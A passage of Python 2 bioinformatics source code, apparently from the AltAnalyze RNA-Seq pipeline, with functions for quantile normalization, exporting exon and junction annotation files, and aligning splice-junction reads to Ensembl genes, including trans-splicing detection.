try:
del steady_state_db[gene] ### Hence, no genes showed evidence of expression (most critical for RNA-Seq)
except Exception: null=[] ### Error occurs when a gene is added to the database from self.location_gene_db, but is not expressed
return steady_state_db
def returnLargeGlobalVars():
### Prints all large global variables retained in memory (taking up space)
all = [var for var in globals() if (var[:2], var[-2:]) != ("__", "__")]
for var in all:
try:
if len(globals()[var])>1:
print var, len(globals()[var])
except Exception: null=[]
def clearObjectsFromMemory(db_to_clear):
db_keys={}
for key in db_to_clear: db_keys[key]=[]
for key in db_keys:
try: del db_to_clear[key]
except Exception:
try:
for i in key: del i ### For lists of tuples
except Exception: del key ### For plain lists
def verifyFile(filename):
status = 'not found'
try:
fn=filepath(filename)
for line in open(fn,'rU').xreadlines(): status = 'found';break
except Exception: status = 'not found'
return status
def AppendOrWrite(export_path):
export_path = filepath(export_path)
status = verifyFile(export_path)
if status == 'not found':
export_data = export.ExportFile(export_path) ### Write this new file
else:
export_data = open(export_path,'a') ### Appends to existing file
return export_data, status
def quantileNormalizationSimple(condition_count_db):
### Basic quantile normalization method (average ranked expression values)
### Get all junction or exon entries
key_db={}
for condition in condition_count_db:
count_db = condition_count_db[condition]
for key in count_db: key_db[key]=[]
condition_unnormalized_db={}
for key in key_db:
### Only look at the specific biotype of interest for each normalization
for condition in condition_count_db:
count_db = condition_count_db[condition]
try:
count = float(count_db[key])+1 ###This adjustment allows us to obtain more realist folds where 0 is compared and use log2
count_db[key] = [] ### Set equal to null as a temporary measure to save memory
except KeyError: count = 1.00 ###Was zero, but needs to be one for more realistic log2 fold calculations
### store the minimal information to recover the original count and ID data prior to quantile normalization
try: condition_unnormalized_db[condition].append([count,key])
except Exception: condition_unnormalized_db[condition]=[[count,key]]
quantile_normalize_db={}; key_db={}
for condition in condition_unnormalized_db:
condition_unnormalized_db[condition].sort() ### Sort lists by count number
rank=0 ### thus, the ID is the rank order of counts
for (count,key) in condition_unnormalized_db[condition]:
try: quantile_normalize_db[rank].append(count)
except KeyError: quantile_normalize_db[rank] = [count]
rank+=1
### Get the average value for each index
for rank in quantile_normalize_db:
quantile_normalize_db[rank] = Average(quantile_normalize_db[rank])
for condition in condition_unnormalized_db:
rank=0
count_db = condition_count_db[condition]
for (count,key) in condition_unnormalized_db[condition]:
avg_count = quantile_normalize_db[rank]
rank+=1
count_db[key] = str(avg_count) ### re-set this value to the normalized value
try:
clearObjectsFromMemory(condition_unnormalized_db); condition_unnormalized_db = []
clearObjectsFromMemory(quantile_normalize_db); quantile_normalize_db = []
except Exception: None
return condition_count_db
def combineExonAnnotations(db):
for i in db:
list1=[]; list2=[]
for (junctions,splice_event) in db[i]:
list1.append(junctions); list2.append(splice_event)
junctions = EnsemblImport.combineAnnotations(list1)
splice_event = EnsemblImport.combineAnnotations(list2)
db[i] = junctions,splice_event
return db
def formatID(id):
### JunctionArray methods handle IDs with ":" different than those that lack this
return string.replace(id,':','@')
def filterChromosomes(chromosome_names):
### If transcriptome only aligned to Ensembl reference, many chromosomes are not real
updated_chromosomes=[]
chr_count=0
for chr in chromosome_names:
if 'chr' in chr and len(chr)<7:
chr_count+=1
updated_chromosomes.append(chr)
if chr_count>1:
return updated_chromosomes
else:
return chromosome_names
def getChromosomeStrandCoordinates(species,testImport):
### For novel junctions with no known-splice site, map to genes
gene_location_db = EnsemblImport.getEnsemblGeneLocations(species,'RNASeq','key_by_array')
chr_strand_gene_db = {}; location_gene_db = {}; chromosome_names={}; all_chromosomes={}
for gene in gene_location_db:
chr,strand,start,end = gene_location_db[gene]
location_gene_db[chr,int(start),int(end)] = gene,strand
try: chr_strand_gene_db[chr,strand].append((int(start),int(end)))
except KeyError: chr_strand_gene_db[chr,strand] = [(int(start),int(end))]
if testImport == 'yes':
if chr=='chr1': chromosome_names[chr]=[]
#if chr=='chr19': chromosome_names[chr]=[] ### Gene rich chromosome
#if chr=='chrMT': chromosome_names[chr]=[] ### Gene rich chromosome
elif len(chr)<7: chromosome_names[chr]=[]
all_chromosomes[chr]=[]
#chromosome_names = filterChromosomes(chromosome_names)
### Some organisms aren't organized into classical chromosomes (why I don't know)
if len(chromosome_names)<10 and len(all_chromosomes)>9 and testImport=='no': chromosome_names = all_chromosomes
return chr_strand_gene_db,location_gene_db,chromosome_names,gene_location_db
def exportDatasetLinkedExons(species,exons_to_export,critical_exon_annotations,root_dir,testImport=None,searchChr=None):
export_path = root_dir+'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_exons.txt'
if searchChr != None:
export_path = string.replace(export_path,'RNASeq/'+species,'RNASeq/exons/'+species)
export_path = string.replace(export_path,'.txt','.'+searchChr+'.txt')
if testImport == 'yes': print 'Writing',export_path
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
export_title = ['AltAnalyzeID','exon_id','ensembl_gene_id','transcript_cluster_id','chromosome','strand','probeset_start','probeset_stop']
export_title +=['class','constitutive_probeset','ens_exon_ids','ens_constitutive_status','exon_region','exon-region-start(s)','exon-region-stop(s)','splice_events','splice_junctions']
export_title = string.join(export_title,'\t')+'\n'; export_data.write(export_title)
### We stored these in a dictionary to make sure each exon is written only once and so we can organize by gene
exons_to_export_list=[]
for key in exons_to_export:
ed = exons_to_export[key]
exons_to_export_list.append((key,ed))
exons_to_export_list.sort()
for (key,ed) in exons_to_export_list:
constitutive_call = 'no'; ens_constitutive_status = '0'
try:
red = ed.ExonRegionData()
exon_region = ed.ExonRegionID()
start = str(ed.ReadStart()); stop = start
if '-' not in exon_region and '_' not in exon_region: annotation = 'known'
else: annotation = 'novel'
except Exception:
red = ed ### For annotated exons, no difference in the annotations
exon_region = ed.ExonRegionIDs()
start = str(red.ExonStart()); stop = str(red.ExonStop())
constitutive_call = red.Constitutive()
if constitutive_call == 'yes': ens_constitutive_status = '1'
annotation = 'known'
uid = red.GeneID()+':'+exon_region
splice_events = red.AssociatedSplicingEvent(); splice_junctions = red.AssociatedSplicingJunctions()
if uid in critical_exon_annotations:
splice_junctions,splice_events = critical_exon_annotations[uid]
export_values = [uid, exon_region, red.GeneID(), '', red.Chr(), red.Strand(), start, stop, annotation, constitutive_call, red.ExonID(), ens_constitutive_status]
export_values+= [exon_region, str(red.ExonStart()), str(red.ExonStop()), splice_events, splice_junctions]
export_values = string.join(export_values,'\t')+'\n'; export_data.write(export_values)
export_data.close()
def exportNovelJunctions(species,novel_junction_db,condition_count_db,root_dir,dataset_name,biotype):
if 'exp.' not in dataset_name: dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name: dataset_name+='.txt'
dataset_name = string.replace(dataset_name,'exp','novel')
dataset_name = string.replace(dataset_name,'.txt','.'+biotype+'.txt')
export_path = root_dir+'ExpressionInput/'+dataset_name
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
title = ['chr','strand','start','stop','start Ensembl','end Ensembl','known start', 'known end']
for condition in condition_count_db: title.append(condition)
export_data.write(string.join(title,'\t')+'\n')
for key in novel_junction_db:
ji = novel_junction_db[key]
try: gene1 = str(ji.GeneID())
except Exception: gene1=''
try: gene2 = str(ji.SecondaryGeneID())
except Exception: gene2 = 'None'
try: le = str(ji.LeftExonAnnotations())
except Exception: le = ''
try: re = str(ji.RightExonAnnotations())
except Exception: re = ''
if biotype == 'junction':
values = [ji.Chr(), ji.Strand(), str(ji.Exon1Stop()), str(ji.Exon2Start())]
elif biotype == 'exon':
values = [ji.Chr(), ji.Strand(), str(ji.Exon1Stop()-1), str(ji.Exon2Start()+1)] ### correct for initial adjustment
values += [gene1,gene2,le,re]
for condition in condition_count_db:
count_db = condition_count_db[condition]
try: read_count = count_db[key]
except KeyError: read_count = '0'
values.append(read_count)
export_data.write(string.join(values,'\t')+'\n')
export_data.close()
def exportDatasetLinkedGenes(species,gene_location_db,root_dir):
"""Include an entry for gene IDs to include constitutive expression for RPKM normalized data"""
export_path = root_dir+'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_junctions.txt'
export_data,status = AppendOrWrite(export_path)
for gene in gene_location_db:
chr,strand,start,end = gene_location_db[gene]
export_values = [gene, 'E0.1',gene, '', chr, strand, str(start), str(end), 'known', 'yes', gene, '1']
export_values+= ['E0.1', str(start), str(end), '', '']
export_values = string.join(export_values,'\t')+'\n'; export_data.write(export_values)
export_data.close()
def exportDatasetLinkedJunctions(species,junction_db,junction_annotations,root_dir,testImport=False,searchChr=None):
export_path = root_dir+'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_junctions.txt'
if searchChr != None:
export_path = string.replace(export_path,'RNASeq/'+species,'RNASeq/junctions/'+species)
export_path = string.replace(export_path,'.txt','.'+searchChr+'.txt')
if testImport == 'yes': print 'Writing',export_path
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
export_title = ['AltAnalyzeID','exon_id','ensembl_gene_id','transcript_cluster_id','chromosome','strand','probeset_start','probeset_stop']
export_title +=['class','constitutive_probeset','ens_exon_ids','ens_constitutive_status','exon_region','exon-region-start(s)','exon-region-stop(s)','splice_events','splice_junctions']
export_title = string.join(export_title,'\t')+'\n'; export_data.write(export_title)
for key in junction_db:
(chr,exon1_stop,exon2_start) = key
ji=junction_db[key]
#print key, ji.UniqueID(), ji.GeneID()
if ji.GeneID()!=None and ji.UniqueID()!=None:
if ji.UniqueID() in junction_annotations: ### Obtained from JunctionArray.inferJunctionComps()
junctions,splice_events = junction_annotations[ji.UniqueID()]
if ji.TransSplicing() == 'yes':
if len(splice_events)>0: splice_events+= '|trans-splicing'
else: splice_events = 'trans-splicing'
ji.setAssociatedSplicingEvent(splice_events); ji.setAssociatedSplicingJunctions(junctions)
elif ji.TransSplicing() == 'yes':
ji.setAssociatedSplicingEvent('trans-splicing')
try:
try: constitutive_call = ji.Constitutive()
except Exception:
jd = ji.ExonAnnotations()
constitutive_call = jd.Constitutive()
if constitutive_call == 'yes': ens_constitutive_status = '1'
else: ens_constitutive_status = '0'
annotation = 'known'
except Exception:
constitutive_call = 'no'; ens_constitutive_status = '0'; annotation = 'novel'
if 'I' in ji.ExonRegionID() or 'U' in ji.ExonRegionID() or '_' in ji.ExonRegionID():
annotation = 'novel' ### Not previously indicated well (as I remember) for exon-level reads - so do this
export_values = [ji.UniqueID(), ji.ExonRegionID(), ji.GeneID(), '', ji.Chr(), ji.Strand(), str(ji.Exon1Stop()), str(ji.Exon2Start()), annotation, constitutive_call, ji.ExonID(), ens_constitutive_status]
export_values+= [ji.ExonRegionID(), str(ji.Exon1Stop()), str(ji.Exon2Start()), ji.AssociatedSplicingEvent(), ji.AssociatedSplicingJunctions()]
export_values = string.join(export_values,'\t')+'\n'; export_data.write(export_values)
export_data.close()
def combineDetectedExons(unmapped_exon_db,align_exon_db,novel_exon_db):
### Used for exon alignments (both start position and end position aligned to exon/intron/UTR regions)
### Reformat align_exon_db to easily lookup exon data
aligned_exon_lookup_db={}
for gene in align_exon_db:
for ed in align_exon_db[gene]:
aligned_exon_lookup_db[gene,ed.ReadStart()]=ed
#if gene == 'ENSMUSG00000064181': print ed.ReadStart(),ed.ExonRegionID()
### Reformat novel_exon_db to easily lookup exon data - created from junction analysis (rename above exons to match novel junctions)
novel_exon_lookup_db={}
for gene in novel_exon_db:
for ed in novel_exon_db[gene]:
try:
### Only store exons that are found in the novel exon file
null = aligned_exon_lookup_db[gene,ed.ReadStart()+1] ### offset introduced on import
novel_exon_lookup_db[gene,ed.ReadStart()+1]=ed
except Exception: null=[]
try:
### Only store exons that are found in the novel exon file
null = aligned_exon_lookup_db[gene,ed.ReadStart()-1] ### offset introduced on import
novel_exon_lookup_db[gene,ed.ReadStart()-1]=ed
except Exception: null=[]
### Lookup the propper exon region ID and gene ID to format the unique ID and export coordinates
x = 0
for key in unmapped_exon_db:
(chr,exon1_stop,exon2_start) = key
ji=unmapped_exon_db[key]
proceed = 'no'
if ji.GeneID() != None:
e1 = (ji.GeneID(),exon1_stop)
e2 = (ji.GeneID(),exon2_start)
exon_info=[]; override_annotation = None; found=[]
try: null = aligned_exon_lookup_db[e1]; found.append(1)
except Exception: null=[]
try: null = aligned_exon_lookup_db[e2]; found.append(2)
except Exception: null=[]
try: null = novel_exon_lookup_db[e1]; override_annotation = 1
except Exception:
try: null = novel_exon_lookup_db[e2]; override_annotation = 2
except Exception: null=[]
if len(found)>0:
### Below is not the simplist way to do this, but should be the fastest
if 1 in found: exon_info.append(aligned_exon_lookup_db[e1])
if 2 in found: exon_info.append(aligned_exon_lookup_db[e2])
if len(exon_info) == 2: ed1,ed2 = exon_info
else:
ed1 = exon_info[0]; ed2 = ed1; x+=1 ### if only one splice site aligned to a gene region (shouldn't occur)
if x == 2: null=[]; #print 'SOME EXONS FOUND WITH ONLY ONE ALIGNING POSITION...',key,ji.GeneID(),ed1.ExonRegionID(),e1,e2
try: red1 = ed1.ExonRegionData(); red2 = ed2.ExonRegionData()
except Exception:
"""
print [ji.GeneID(), ji.Chr(), key]
print e1, e2
try: print ed1.ExonRegionData()
except Exception: 'ed1 failed'
try: print ed2.ExonRegionData()
except Exception: 'ed2 failed'
"""
continue
region1 = ed1.ExonRegionID(); region2 = ed2.ExonRegionID()
#print region1,region2,ji.GeneID(),ji.Chr(),ji.Strand()
try: splice_junctions = EnsemblImport.combineAnnotations([red1.AssociatedSplicingJunctions(),red2.AssociatedSplicingJunctions()])
except Exception: print red1, red2;sys.exit()
splice_events = EnsemblImport.combineAnnotations([red1.AssociatedSplicingEvent(),red2.AssociatedSplicingEvent()])
ji.setAssociatedSplicingJunctions(splice_junctions)
ji.setAssociatedSplicingEvent(splice_events)
ens_exon_ids = EnsemblImport.combineAnnotations([red1.ExonID(),red2.ExonID()])
ji.setExonID(ens_exon_ids)
if red1.Constitutive() == 'yes' or red2.Constitutive() == 'yes': constitutive_call = 'yes'
else: constitutive_call = 'no'
ji.setConstitutive(constitutive_call)
report_both_regions = 'no'
try:
### If the annotations are from a BED file produced by AltAnalyze, novel alternative splice sites may be present
### if the below variable is not created, then this exon may over-ride the annotated exon region (e.g., E15.1 is over-written by E15.1_1234;E15.1_1256)
if 'ENS' in ji.JunctionID() and ':' not in ji.JunctionID(): report_both_regions = 'yes'
except Exception: null=[]
try:
### If the annotations are from a BED file produced by AltAnalyze, it is possible for to a known exon to share a splice-site coordinate
### with a novel junction exon. This will cause both to have the same override_annotation. Prevent this with the below 2nd override
if 'ENS' in ji.JunctionID() and ':' in ji.JunctionID(): override_annotation = None
except Exception: null=[]
if override_annotation != None:
if '_' in region1: region1 = string.split(region1,'_')[0]+'_'+str(int(string.split(region1,'_')[-1])-1)
if '_' in region2: region2 = string.split(region2,'_')[0]+'_'+str(int(string.split(region2,'_')[-1])+1)
if override_annotation == 1: region_id = region1 ### This forces a TopHat exon to be named for the splice-site position
else: region_id = region2
else:
if report_both_regions == 'no':
### Don't include specific start and end coordinates if inside a known exon
if ed1.AlignmentRegion() == 'exon': region1 = string.split(region1,'_')[0]
if ed2.AlignmentRegion() == 'exon': region2 = string.split(region2,'_')[0]
if ed1.AlignmentRegion() == 'full-intron' and ed2.AlignmentRegion() == 'full-intron':
region1 = string.split(region1,'_')[0]; region2 = string.split(region2,'_')[0]
### Below adjustmements need to compenstate for adjustments made upon import
if '_' in region1: region1 = string.split(region1,'_')[0]+'_'+str(int(string.split(region1,'_')[-1])-1)
if '_' in region2: region2 = string.split(region2,'_')[0]+'_'+str(int(string.split(region2,'_')[-1])+1)
ji.setExon1Stop(ji.Exon1Stop()-1); ji.setExon2Start(ji.Exon2Start()+1)
if override_annotation != None: null=[] ### It is already assigned above
elif region1 == region2: region_id = region1
elif ji.Strand() == '+': region_id = region1+';'+region2
else: region_id = region2+';'+region1 ### start and stop or genomically assigned
uid = ji.GeneID()+':'+region_id
#try: exon_region_db[ji.GeneID()].append((formatID(uid),region_id))
#except KeyError: exon_region_db[ji.GeneID()]=[(formatID(uid),region_id)]
ji.setExonRegionID(region_id)
ji.setUniqueID(uid) ### hgu133
### Export format for new exons to add to the existing critical exon database (those in exon_region_db are combined with analyzed junctions)
#exons_to_export[ji.GeneID(),region_id] = ji
else:
#print key, ji.GeneID(), ji.JunctionID(); sys.exit()
null=[] ### Occurs because two genes are overlapping
#return exons_to_export
def annotateNovelJunctions(novel_junction_db,novel_exon_db,exons_to_export):
### Reformat novel_exon_db to easily lookup exon data
novel_exon_lookup_db={}
for gene in novel_exon_db:
for ed in novel_exon_db[gene]:
novel_exon_lookup_db[gene,ed.ReadStart()]=ed
### Lookup the propper exon region ID and gene ID to format the unique ID and export coordinates
junction_region_db={}
unknown_gene_junctions={}
for key in novel_junction_db:
(chr,exon1_stop,exon2_start) = key
ji=novel_junction_db[key]
proceed = 'no'
if ji.GeneID() != None:
if ji.SpliceSitesFound() != 'both':
e1 = (ji.GeneID(),exon1_stop)
if ji.TransSplicing() == 'yes':
e2 = (ji.SecondaryGeneID(),exon2_start)
else: e2 = (ji.GeneID(),exon2_start)
if e1 in novel_exon_lookup_db and e2 in novel_exon_lookup_db:
proceed = 'yes'
try: ed1 = novel_exon_lookup_db[e1]; red1 = ed1.ExonRegionData(); gene1 = e1[0]
except Exception:
print chr, key, e1; kill
ed2 = novel_exon_lookup_db[e2]; red2 = ed2.ExonRegionData(); gene2 = e2[0]
### If the splice-site was a match to a known junciton splice site, use it instead of that identified by exon-region location overlapp
if ji.LeftExonAnnotations() != None: region1 = ji.LeftExonAnnotations()
else: region1 = ed1.ExonRegionID(); exons_to_export[gene1,region1] = ed1
if ji.RightExonAnnotations() != None: region2 = ji.RightExonAnnotations()
else: region2 = ed2.ExonRegionID(); exons_to_export[gene2,region2] = ed2
#print region1,region2,ji.GeneID(),ji.Chr(),ji.Strand(), ji.LeftExonAnnotations(), ji.RightExonAnnotations()
else:
proceed = 'yes'
region1 = ji.LeftExonAnnotations()
region2 = ji.RightExonAnnotations()
red1 = ji.LeftExonRegionData()
red2 = ji.RightExonRegionData()
### Store the individual exons for export
gene1 = ji.GeneID()
if ji.TransSplicing() == 'yes': gene2 = ji.SecondaryGeneID()
else: gene2 = ji.GeneID()
exons_to_export[gene1,region1] = red1
exons_to_export[gene2,region2] = red2
if proceed == 'yes':
try: splice_junctions = EnsemblImport.combineAnnotations([red1.AssociatedSplicingJunctions(),red2.AssociatedSplicingJunctions()])
except Exception: print red1, red2;sys.exit()
splice_events = EnsemblImport.combineAnnotations([red1.AssociatedSplicingEvent(),red2.AssociatedSplicingEvent()])
ji.setAssociatedSplicingJunctions(splice_junctions)
ji.setAssociatedSplicingEvent(splice_events)
ens_exon_ids = EnsemblImport.combineAnnotations([red1.ExonID(),red2.ExonID()])
ji.setExonID(ens_exon_ids)
if ji.TransSplicing() == 'yes':
uid = ji.GeneID()+':'+region1+'-'+ji.SecondaryGeneID()+':'+region2
region_id = uid
### When trans-splicing occurs, add the data twice to junction_region_db for the two different genes
### in JunctionArray.inferJunctionComps, establish two separate gene junctions with a unique ID for the non-gene exon
try: junction_region_db[ji.GeneID()].append((formatID(uid),region1+'-'+'U1000.1_'+str(ji.Exon2Start())))
except KeyError: junction_region_db[ji.GeneID()]=[(formatID(uid),region1+'-'+'U1000.1_'+str(ji.Exon2Start()))]
try: junction_region_db[ji.SecondaryGeneID()].append((formatID(uid),'U0.1_'+str(ji.Exon1Stop())+'-'+region2))
except KeyError: junction_region_db[ji.SecondaryGeneID()]=[(formatID(uid),'U0.1_'+str(ji.Exon1Stop())+'-'+region2)]
else:
uid = ji.GeneID()+':'+region1+'-'+region2
region_id = region1+'-'+region2
try: junction_region_db[ji.GeneID()].append((formatID(uid),region_id))
except KeyError: junction_region_db[ji.GeneID()]=[(formatID(uid),region_id)]
ji.setExonRegionID(region_id)
ji.setUniqueID(uid)
else:
unknown_gene_junctions[key]=[]
return junction_region_db,exons_to_export
def alignReadsToExons(novel_exon_db,ens_exon_db,testImport=False):
### Simple method for aligning a single coordinate to an exon/intron region of an already matched gene
examined_exons=0; aligned_exons=0
for gene in ens_exon_db: #novel_exon_db
try:
region_numbers=[]; region_starts=[]; region_stops=[]
for ed in novel_exon_db[gene]:
examined_exons+=1; aligned_status=0; index=-1
for rd in ens_exon_db[gene]:
index+=1 ### keep track of exon/intron we are in
region_numbers.append(int(string.split(rd.ExonRegionIDs()[1:],'.')[0]))
if rd.Strand() == '-': region_starts.append(rd.ExonStop()); region_stops.append(rd.ExonStart())
else: region_starts.append(rd.ExonStart()); region_stops.append(rd.ExonStop())
#print [rd.ExonStart(),rd.ExonStop(), rd.Strand()]
#print [ed.ReadStart(),rd.ExonStart(),rd.ExonStop()]
if ed.ReadStart()>=rd.ExonStart() and ed.ReadStart()<=rd.ExonStop():
ed.setAlignmentRegion('exon')
if 'I' in rd.ExonRegionIDs(): ### In an annotated intron
ed.setAlignmentRegion('intron')
ord = rd; updated = None
try: ### If the splice site is a novel 3' splice site then annotate as the 3' exon (less than 50nt away)
nrd = ens_exon_db[gene][index+1]
if (abs(ed.ReadStart()-nrd.ExonStart())<3) or (abs(ed.ReadStart()-nrd.ExonStop())<3):
ed.setAlignmentRegion('full-intron') ### this is the start/end of intron coordinates
elif (abs(ed.ReadStart()-nrd.ExonStart())<50) or (abs(ed.ReadStart()-nrd.ExonStop())<50): rd = nrd; updated = 1
except Exception: null=[]
try:
prd = ens_exon_db[gene][index-1]
if (abs(ed.ReadStart()-prd.ExonStart())<3) or (abs(ed.ReadStart()-prd.ExonStop())<3):
ed.setAlignmentRegion('full-intron')### this is the start/end of intron coordinates
elif (abs(ed.ReadStart()-prd.ExonStart())<50) or (abs(ed.ReadStart()-prd.ExonStop())<50):
if updated==1: rd = ord; ###Hence the intron is too small to descriminate between alt5' and alt3' exons
else: rd = prd
except Exception: null=[]
ed.setExonRegionData(rd); aligned_exons+=1; aligned_status=1
if rd.ExonStop()==ed.ReadStart():
ed.setExonRegionID(rd.ExonRegionIDs())
elif rd.ExonStart()==ed.ReadStart():
ed.setExonRegionID(rd.ExonRegionIDs())
elif 'exon-intron' in ed.Annotation(): ### intron retention
ed.setExonRegionID(rd.ExonRegionIDs()) ### Hence there is a 1nt difference between read
else:
ed.setExonRegionID(rd.ExonRegionIDs()+'_'+str(ed.ReadStart()))
break
if aligned_status == 0: ### non-exon/intron alinging sequences
region_numbers.sort(); region_starts.sort(); region_stops.sort()
if (rd.Strand() == '+' and ed.ReadStart()>=rd.ExonStop()) or (rd.Strand() == '-' and rd.ExonStop()>=ed.ReadStart()):
### Applicable to 3'UTR (or other trans-splicing) aligning
utr_id = 'U'+str(region_numbers[-1])+'.1_'+str(ed.ReadStart())
ud = EnsemblImport.ExonAnnotationsSimple(rd.Chr(),rd.Strand(),region_stops[-1],region_stops[-1],gene,'','no',utr_id,'','')
ed.setExonRegionID(utr_id)
else:
### Applicable to 5'UTR (or other trans-splicing) aligning
utr_id = 'U0.1'+'_'+str(ed.ReadStart())
ud = EnsemblImport.ExonAnnotationsSimple(rd.Chr(),rd.Strand(),region_starts[0],region_starts[0],gene,'','no',utr_id,'','')
ed.setExonRegionID(utr_id)
ed.setExonRegionData(ud)
ed.setAlignmentRegion('UTR')
except Exception: null=[]
if testImport == 'yes': print aligned_exons, 'splice sites aligned to exon region out of', examined_exons
def geneAlign(chr,chr_gene_locations,location_gene_db,chr_reads,switch_coord,read_aligned_to_gene):
""" This function aligns the start or end position for each feature (junction or exon) to a gene, in two
steps by calling this function twice. In the second interation, the coordinates are reversed """
index = 0 ### Don't examine genes already looked at
genes_assigned = 0; trans_splicing=[]
for (coord,ji) in chr_reads: ### junction coordinates or exon coordinates with gene object
if index >5: index -=5 ### It is possible for some genes to overlap, so set back the index of genomically ranked genes each time
gene_id_obtained = 'no'
if switch_coord == 'no': rs,re=coord ### reverse the coordinates for the second iteration
else: re,rs=coord ### first-interation coordinates (start and end)
while index < len(chr_gene_locations):
cs,ce = chr_gene_locations[index]
#print [re,rs,cs,ce, ji.Chromosome()];sys.exit()
### Determine if the first listed coordinate lies within the gene
if cs <= rs and ce >= rs:
### Yes, it does
gene,strand = location_gene_db[chr,cs,ce]
if switch_coord == 'yes': ### Only applies to coordinates, where the end-position didn't lie in the same gene as the start-position
if cs <= re and ce >= re:
### This occurs when the first iteration detects a partial overlap, but the gene containing both coordinates is downstream
### Hence, not trans-splicing
ji.setGeneID(gene)
break
first_geneid = ji.GeneID() ### see what gene was assigned in the first iteration (start position only)
#print ['trans',coord, first_geneid, gene] ### Note: in rare cases, an exon can overlap with two genes (bad Ensembl annotations?)
ji.setTransSplicing()
side = ji.checkExonPosition(rs)
if side == 'left':
ji.setGeneID(gene)
ji.setSecondaryGeneID(first_geneid)
else:
ji.setSecondaryGeneID(gene)
#if ji.GeneID() == None: print 'B',coord, ji.GeneID(), secondaryGeneID()
#print ji.GeneID(), ji.SecondaryGeneID();kill
genes_assigned+=1; gene_id_obtained = 'yes'
### Check to see if this gene represents a multi-gene spanning region (overlaps with multiple gene loci)
try:
### This code was used to check and see if the gene is multi-spanning. Appears that the < sign is wrong > anyways, never go to the next gene unless the next read has passed it
#cs2,ce2 = chr_gene_locations[index+1]
#if cs2 < ce: index+=1 ### Continue analysis (if above is correct, the gene will have already been assigned)
#else: break
break
except Exception: break
else:
### First iteration, store the identified gene ID (only looking at the start position)
ji.setGeneID(gene); gene_id_obtained = 'yes'
#print gene, rs, re, cs, ce
### Check the end position, to ensure it is also lies within the gene region
if cs <= re and ce >= re:
genes_assigned+=1
else:
### Hence, the end lies outside the gene region
trans_splicing.append((coord,ji))
### Check to see if this gene represents a multi-gene spanning region (overlaps with multiple gene loci)
try:
### This code was used to check and see if the gene is multi-spanning. Appears that the < sign is wrong > anyways, never go to the next gene unless the next read has passed it
#cs2,ce2 = chr_gene_locations[index+1]
#if cs2 < ce: index+=1 ### Continue analysis (if above is correct, the gene will have already been assigned)
#else: break
break
except Exception: break
else:
if rs < ce and re < ce: break
elif switch_coord == 'no' and cs <= re and ce >= re:
### This can occur if the left junction splice site is in an exon and the other is the UTR as opposed to another gene
gene,strand = location_gene_db[chr,cs,ce]
ji.setSecondaryGeneID(gene); gene_id_obtained = 'yes'
#print gene, coord, ji.Strand(), ji.GeneID()
index+=1
if gene_id_obtained == 'no':
### These often appear to be genes predicted by tBLASTn at UCSC but not by Ensembl (e.g., chr17:27,089,652-27,092,318 mouse mm9)
null=[]
#ji.setGeneID(None) ### This is not necessary, since if one exon does not align to a gene it is still a valid alignment
#print chr,coord
read_aligned_to_gene += genes_assigned
#print genes_assigned, chr, 'Gene IDs assigned out of', len(chr_reads)
#print len(trans_splicing),'reads with evidence of trans-splicing'
### For any coordinate-pair where the end-position doesn't lie within the same gene as the start, re-run for those to see which gene they are in
if switch_coord == 'no' and len(trans_splicing)>0:
read_aligned_to_gene = geneAlign(chr,chr_gene_locations,location_gene_db,trans_splicing,'yes',read_aligned_to_gene)
return read_aligned_to_gene
def getNovelExonCoordinates(species,root_dir):
""" Currently, any novel exon determined during initial RNA-Seq read annotation with defined start and end coordinates, only has
the exon-end coordinate, not start, in it's name. However, the start and stop are indicated in the counts.Experiment.txt file.
To get this, we parse that file and only store exons with an I or U in them and then correct for this in the matching function below """
exp_dir = root_dir+'/ExpressionInput/'
dir_list = read_directory(exp_dir)
counts_file = None
for file in dir_list:
if 'counts.' in file and 'steady' not in file:
counts_file = file
### Example
#ENSG00000137076:I17.1_35718353=chr9:35718353-35718403 (novel exon coordinates - just sorted, not necessarily in the correct order)
#ENSG00000137076:E17.1-I17.1_35718403=chr9:35718809-35718403 (5' supporting junction)
#ENSG00000137076:I17.1_35718353-E18.1=chr9:35718353-35717783 (3' supporting junction)
#here, once we see that I17.1_35718353 is the exon ID, we know we need to get the function with -I17.1_35718403 (always the second value)
if counts_file!=None:
fn=filepath(exp_dir+counts_file)
print 'Reading counts file'
novel_exon_db = parseCountFile(fn,'exons',{}) ### Get novel exons
print 'Reading counts file'
novel_exon_db = parseCountFile(fn,'junctions',novel_exon_db) ### Get novel exons
return novel_exon_db
def getMaxCounts(fn,cutoff,filterExport=False,filterExportDir=False):
firstLine=True
expressed_uids={}
if filterExport != False:
eo=export.ExportFile(filterExportDir)
for line in open(fn,'rU').xreadlines():
Line = cleanUpLine(line)
t = string.split(Line,'\t')
key = t[0]
if firstLine:
firstLine = False
if filterExport != False:
eo.write(line)
else:
if filterExport != False:
if key in filterExport:
eo.write(line)
else:
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
try: maxExp = max(map(lambda x: float(x), t[1:])); #print maxExp;sys.exit()
except Exception:
#print t[1:];sys.exit()
if 'NA' in t[1:]:
tn = [0 if x=='NA' else x for x in t[1:]] ### Replace NAs
maxExp = max(map(lambda x: float(x), tn))
elif '' in t[1:]:
tn = [0 if x=='' else x for x in t[1:]] ### Replace blanks
maxExp = max(map(lambda x: float(x), tn))
else:
maxExp=cutoff+1
#gene = string.split(uid,':')[0]
if maxExp > cutoff:
expressed_uids[uid] = []
return expressed_uids
def check_for_ADT(gene):
if '.ADT' in gene or '-ADT' in gene:
return True
elif len(gene)>17 and '-' in gene:
if len(string.split(gene,'-')[1])>11:
return True
else:
return False
else:
return False
def importBiologicalRelationships(species):
### Combine non-coding Ensembl gene annotations with UniProt functional annotations
import ExpressionBuilder
custom_annotation_dbase={}
try: coding_db = ExpressionBuilder.importTranscriptBiotypeAnnotations(species)
except Exception: coding_db = {}
try: gene_to_symbol_db = ExpressionBuilder.importGeneAnnotations(species)
except Exception: gene_to_symbol_db = {}
for gene in coding_db:
#coding_type = string.split(coding_db[gene][-1],'|')
coding_type = coding_db[gene][-1]
if 'protein_coding' in coding_type:
coding_type = 'protein_coding'
else:
coding_type = 'ncRNA'
status = check_for_ADT(gene)
if gene in gene_to_symbol_db:
symbol = string.lower(gene_to_symbol_db[gene][0])
### The below genes cause issues with many single cell datasets in terms of being highly correlated
